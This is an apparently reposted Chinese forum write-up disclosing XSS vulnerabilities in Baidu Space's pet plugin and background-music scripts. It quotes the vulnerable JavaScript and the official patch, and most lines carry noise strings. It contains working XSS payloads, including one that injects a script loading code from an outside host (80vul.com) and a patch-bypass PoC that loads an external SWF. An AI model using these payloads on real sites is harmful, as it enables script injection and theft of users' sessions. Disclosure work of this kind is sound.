百度空间的宠物插件对用户输入变量未经任何过滤便存储,并不经过滤输出,造成XSS.
6 P, Q$ g6 Y) Z# D
& _: _: V, A& k7 b1.在http://hi.baidu.com/p__z/modify/sppet中,用户可以输入留言管理,提交后,未过滤直接储存. # t/ R4 K+ i" R8 s9 _
2.在http://hi.baidu.com/ui/scripts/pet/pet.js中 / ]7 C6 g% q& h% i
# S- ?+ L0 `- y5 p
将输出一段HTML:<p style="margin-top:5px"><strong>’+F[2]+"说:</strong>"+BdUtil.insertWBR(F[0], 4)+’</p> 6 Z0 E, D+ y$ r
其中BdUtil.insertWBR为
7 Q2 W- b1 |9 m, [ i( H' T" Lfunction(text, step) {
# W, U( b( G; h4 d. y3 G var textarea = textAreaCache || getContainer();
6 M" ^* A ^' Y# w7 c if (!textarea) {
0 f( }+ b8 U7 E e return text; : z9 a3 t* A/ _/ t
}
: h2 s Y9 Q* w E3 u) `. W6 \4 ] textarea.innerHTML = text.replace(/&/g, "&").replace(/</g, "<").replace(/>/g, ">"); 8 Z) u% Z/ W8 Q4 L
var string = textarea.value; ' q* \7 N6 L7 a& `
var step = step || 5, reg = new RegExp("(\\S{" + step + "})", "gi");
3 W+ G6 x) o( k: t, O9 U: R var result = string.replace(/(<[^>]+>)/gi, "$1<wbr/>").replace(/(>|^)([^<]+)(<|$)/gi, function (a, b, c, d) {if (c.length < step) {return a;}return b + c.replace(reg, "$1<wbr/>") + d;}).replace(/&([^;]*)(<wbr\/?>)([^;]*);/g, "&$1$3;"); ; B* G7 a: m( T$ [
return result; 8 d2 m! U8 K) E- k8 [8 a
} 5 A* I5 l4 @7 A( p9 S
在首页中,textAreaCache 和 getContainer()均不存在,故!textarea为true,未经过滤直接return text.造成XSS. ' I0 t% `0 q. m ^" C
测试代码:宠物留言管理处输入:<img src=# onerror=alert(/qing/)> * `# W" M) i$ p0 P
, e) \- l' Z: N" x5 G4 O
二:creatbgmusic() Dom-Xss Bug
; s; v: r% h* T4 r. J百度空间的Javascript Dom函数creatbgmusic()在输出变量bgmusic*没有进行过滤,导致可以通过initBlogTextForFCK()函数构造容易HTML代码,最终导致xss漏洞
% Y6 w% _: k; R& d9 ~
' ?, V$ o0 j8 Y$ y$ e4 H在http://hi.baidu.com//js/bgmusic.js?v=1.0.js 代码: % ~; ]% \4 ?# X" P+ B- D4 n) N, T
- e3 u. r* G- c8 h3 `function creatbgmusic(murl, musicnum, IsMusicHide, IsMusicLoop, IsMusicAutoPlay, unknow, functype) { ; F/ _* o! P- g: T( N
//传入的murl赋值到bgmusic1和bgmusic2中 , p. k/ D3 [. Y5 c7 j
//可以通过构造类似代码来闭合标签如 "><img src=2 onerror=s=document.createElement("script");s.src="http://www.80vul.com/sobb/alert.php";document.body.appendChild(s);>#1 6 r$ S3 a. k! K* Y: J
var bgmusic1 = "<OBJECT id=phx width=100% classid=clsid:6BF52A52-394A-11D3-B153-00C04F79FAA6 " + (IsMusicHide ? "height=45" : "") + ">" + "<PARAM NAME=\"URL\" VALUE=\"" + murl + "?t=" + Math.random() + "\">" + " <PARAM NAME=\"rate\" VALUE=\"1\">" + " <PARAM NAME=\"balance\" VALUE=\"0\">" + " <PARAM NAME=\"currentPosition\" VALUE=\"0\">" + " <PARAM NAME=\"defaultFrame\" VALUE=\"\">" + " <PARAM NAME=\"PlayCount\" VALUE=\"" + (IsMusicLoop ? 100 : 0) + "\">" + " <PARAM NAME=\"DisplayMode\" VALUE=\"0\">" + " <PARAM NAME=\"PreviewMode\" VALUE=\"0\">" + " <PARAM NAME=\"DisplayForeColor\" VALUE=\"16777215\">" + " <PARAM NAME=\"ShowCaptioning\" VALUE=\"0\">" + " <PARAM NAME=\"ShowControls\" VALUE=\"1\">" + " <PARAM NAME=\"ShowAudioControls\" VALUE=\"1\">" + " <PARAM NAME=\"ShowDisplay\" VALUE=\"0\">" + " <PARAM NAME=\"ShowGotoBar\" VALUE=\"0\">" + " <PARAM NAME=\"ShowStatusBar\" VALUE=\"0\">" + " <PARAM NAME=\"ShowTracker\" VALUE=\"1\">" + " <PARAM NAME=\"autoStart\" VALUE=\"" + (IsMusicAutoPlay ? 1 : 0) + "\">" + " <PARAM NAME=\"AutoRewind\" VALUE=\"" + (IsMusicAutoPlay ? 1 : 0) + "\">" + " <PARAM NAME=\"currentMarker\" VALUE=\"0\">" + " <PARAM NAME=\"invokeURLs\" VALUE=\"0\">" + " <PARAM NAME=\"baseURL\" VALUE=\"\">" + " <PARAM NAME=\"volume\" VALUE=\"100\">" + " <PARAM NAME=\"mute\" VALUE=\"0\">" + " <PARAM NAME=\"stretchToFit\" VALUE=\"0\">" + " <PARAM NAME=\"windowlessVideo\" VALUE=\"1\">" + " <PARAM NAME=\"enabled\" VALUE=\"1\">" + " <PARAM NAME=\"EnableFullScreenControls\" VALUE=\"0\">" + " <PARAM NAME=\"EnableTracker\" VALUE=\"1\">" + " <PARAM NAME=\"EnablePositionControls\" VALUE=\"1\">" + " <PARAM NAME=\"enableContextMenu\" VALUE=\"0\">" + " <PARAM NAME=\"SelectionStart\" VALUE=\"0\">" + " <PARAM NAME=\"SelectionEnd\" VALUE=\"0\">" + " <PARAM NAME=\"fullScreen\" VALUE=\"0\">" + " <PARAM NAME=\"SAMIStyle\" VALUE=\"\">" + " <PARAM NAME=\"SAMILang\" VALUE=\"\">" + " <PARAM NAME=\"SAMIFilename\" VALUE=\"\">" + " <PARAM NAME=\"captioningID\" VALUE=\"\">" + " <PARAM NAME=\"Visualizations\" VALUE=\"1\">"; 3 P; o- y2 w8 N7 E
if (musicnum <= 1) { 7 n3 G7 `. m' \9 j
bgmusic1 += " <PARAM NAME=\"uiMode\" VALUE=\"mini\">"; 0 T) O# s0 P) N% f
}
8 v0 i( p/ k1 ?" M5 i* [ g8 N6 P bgmusic1 += "</OBJECT>"; 1 v$ Q+ h* g* ^/ \. R2 c! d. I1 A
var bgmusic2 = "<EMBED src=\"" + murl + "?t=" + Math.random() + "\" width=\"100%\" " + (IsMusicHide ? "height=45" : "") + " type=\"application/x-mplayer2\" invokeurls=\"0\" autogotourl=\"false\" autostart=" + (IsMusicAutoPlay ? 1 : 0) + " loop=" + (IsMusicLoop ? 1 : 0) + " quality=\"high\""; ( ^! m6 f$ {4 F4 t0 E6 V
if (musicnum <= 1) {
3 P" M+ I" d; q9 Z. g) L2 @6 K bgmusic2 += "showcontrols=\"1\" showpositioncontrols=\"0\" ";
0 R1 C% E$ Q1 n$ k& a } 9 C4 {$ E: e; @; U7 i8 r* X- Q! H
bgmusic2 += "> </EMBED>";
5 S7 p4 \- |' Q+ g* b var bgmusic3 = "<div id=\"m_bgmusic\" class=\"modbox\">\u5BF9\u4E0D\u8D77\uFF0C\u60A8\u5C1A\u672A\u5B89\u88C5windows media player\uFF0C\u65E0\u6CD5\u6B23\u8D4F\u8BE5\u7A7A\u95F4\u7684\u80CC\u666F\u97F3\u4E50\uFF0C\u8BF7\u5148<a href=\"http://www.baidu.com/s?wd=windows+media+player+%CF%C2%D4%D8&cl=3\" target=\"_blank\">\u4E0B\u8F7D\u5E76\u5B89\u88C5</a><br><br></div>"; , o( H4 `' n* c/ g- E, Q
var bgmus = detectWMP();
" B) k" q8 v! U3 x7 I i8 h if (functype == "FckMusicHelper") {
2 e+ y% h9 G) h; A3 M7 P if (bgmus.installed) { 7 q) ^0 P0 U6 Y9 m! W6 @+ b
if (bgmus.type == "IE") {
8 E& r/ Y& e+ u+ z2 X return bgmusic1; + D/ i4 u; i0 S: c8 d' {
} else if (bgmus.type == "NS") { % }5 [/ n# |+ w' X' @
return bgmusic2;
% G2 E0 u2 C8 a% U5 }; R2 _" Z& _ } ( Y3 g+ ~3 r+ T7 i
} else { # w; |( C% o' z- O, Q
return bgmusic3;
6 p% w1 @. ]5 Y$ f }
- O( T& u6 P( t9 P0 ] n1 Q } else { 1 \! K& n. B& ?0 ?% Q' a& w8 Z+ N
if (bgmus.installed) {
6 f& L" A3 |% y, t; D& ]" B //document.write 直接输出bgmusic变量 导致xss ?1 S& r% o( I
if (bgmus.type == "IE") { ' p0 n. Q' n+ J& M4 Y
document.write(bgmusic1);
6 X( ?5 ]% r' f! D } else if (bgmus.type == "NS") { ' Z: G, A% _( p
document.write(bgmusic2); % M( t+ I; Y; g
}
3 `$ M" C* c; G- Z6 X } else {
! b8 N4 \' m0 q- }9 I T- R document.write(bgmusic3); . `5 J6 e, N+ o9 S: ^0 g. L: i
}
3 ?8 [" k( j4 \3 r' Z, m% a* G return "";
; u) h3 t6 D- X) Q, ? } 7 F8 H5 [: Y6 k) a0 V9 G2 t; }0 v& h" }
}
: L+ K% {% ~+ l3 k# b+ Y; a/ m
t4 Z9 K7 k% |- [# [ P, L在看百度空间里的initBlogTextForFCK()函数,调用了creatbgmusic() ,代码如下:
8 e+ V }) ?8 a/ d) [/ E
# X9 k0 N8 L7 d7 N( sfunction initBlogTextForFCK(){ $ C3 N' o- R1 l5 b% F
//fck init music 7 E' r/ J# E8 w1 ?" B( k/ t% o
if(window.Node){Node.prototype.replaceNode=function(Node){this.parentNode.replaceChild(Node,this);}} ' O+ B9 c7 M3 D/ s+ `
var imgBox=document.getElementsByName(’musicName’); //取得了文章中的所有name="musicName"的标签数组 ! d- S. t4 A {/ C! k2 f) T
var isAutoPlay=true;
3 q( u6 j1 T6 vfor(var i=0,n=imgBox.length;i<n;i++){ //然后遍历.
8 J) b7 l r( @5 o: ^ ]9 T6 H var img=imgBox; , O4 N2 c& [6 N* I
if(img.getAttribute(’rel’)){
6 V d0 ?7 I$ G" M. ` R var musicSrc=img.getAttribute(’rel’); //取得标签中rel的值,赋值给musicSrc 3 Z% r$ y3 S- {9 }
var musicDiv = document.createElement("SPAN");
) t) ~! [. i( ^2 k* A5 ]1 o var tmp=musicSrc.substr (musicSrc.indexOf(’#’)+1, 1); //以"#"为界分割musicSrc字符串,提取自动播放的flag[tmp] 6 q9 _, }. K: o, U5 B8 E) ~# c
' L+ o7 T& E R; ?8 _% z0 j .......................... 3 T2 R' I2 L1 U X0 r
! Y3 [ \' n: E d1 e( H- l Y* p //直接将部分musicSrc传入creatbgmusic函数.在creatbgmusic函数直接把传入的murl赋值到bgmusic1和bgmusic2中并document.write出来.
6 K3 E+ U( U% P+ D var shtml=creatbgmusic(musicSrc.substr(0,musicSrc.indexOf(’#’)),1,true,false,tmpAutoPlay,tmpAutoPlay,’FckMusicHelper’); 5 Z0 W( S2 w, e1 {9 A' _
shtml=shtml.replace(’width=100%’,’width=200’).replace(’width="100%"’,’width=200 height=45’); img.replaceNode(musicDiv);
4 [# o/ ]( j% E4 d3 d3 r$ _ musicDiv.innerHTML=shtml;
: Q2 {) g) A2 u: T& C; C, v i--;n--;
6 E5 G6 j$ O$ S- a) v0 Z! t0 j' ^5 m } & r. s+ [$ ^% s9 t
}
1 \* D4 S4 O( k J/ T: A
: {. M' i2 U7 Y' W& z从上面的代码分析可以看出:在所有的参数传递中,我们没有看到过滤.百度空间的富文本编辑器的过滤模式是基于HTML语法的,不会过滤掉一个属性的值中的HTML标签.所以我们可以精心构造一个的恶意的标签,在JS进行DOM操作后引起XSS. ' L X" j3 o/ j5 |# r" v8 j
4 @; z0 q9 G3 C* o4 L# A5 B/ d
测试方法:<img width="200" height="45" name="musicName" rel=’"><img src=2 onerror=alert(/qing/)>#1’ src="http://hi.baidu.com/fc/editor/skins/default/update/mplogo.gif"/>
0 I5 t( `4 V. Y; Q' i! j* R" B, A4 R# l$ f# Y
等待官方补丁
7 J' K) e$ W3 t! e7 z- \2 I' {( r5 _" X4 \' c. w$ }0 ~
update 2010年5月13日
; Y# V' @! C% C; D9 l3 D7 R9 j5 ^/ {+ a( X! T$ v
官方补丁: V# k3 V$ l. V! I, e
8 B4 e! H! x! Q* \* d6 vvar shtml=creatbgmusic(musicSrc.substr(0,musicSrc.indexOf(’#’)),1,true,false,tmpAutoPlay,tmpAutoPlay,’FckMusicHelper’);
# e6 \5 u' `4 q3 E7 u改为: 7 G; y D; d0 T
var shtml=creatbgmusic(musicSrc.substr(0,musicSrc.indexOf(’#’)).replace(/[\s><()]+/g,’’),1,true,false,isAutoPlay,isAutoPlay,’FckMusicHelper’); ) U# C- G+ z: m; `
( ^" ~9 b" N; l8 m. k7 `1 d% W+ t
update 2010年5月13日 21:50:37 3 O* K1 Z; f, }8 d: w. h
* d5 H# {/ F! Y9 [; ]5 q
补丁存在漏洞 没有过滤" 可以继续跨: # L* ~; ~: K' m; D6 z) X: n' M% M
& E0 k( j( y* x7 S( bNEW POC: , B% W& `$ J* A% T$ U: T+ X
' d0 g' U0 {7 i9 z, b, Z<img width="200" height="45" _fcksavedurl=" http://hi.baidu.com/fc/editor/skins/default/update/mplogo.gif" src="http://hi.baidu.com/fc/editor/skins/default/update/mplogo.gif" rel=’http://www.xsser.net/pz/js.swf"
; J' a8 }. ?& q( E: m0 _& N1 H$ d' A1 l; s
allowscriptaccess="always" type="application/x-shockwave-flash"#2’ name="musicName"/>
, E3 Z0 C' D% Y% A; Y 1 R7 O L1 \( R% \
|
发表于 2013-8-24 11:51:11
收藏
支持
反对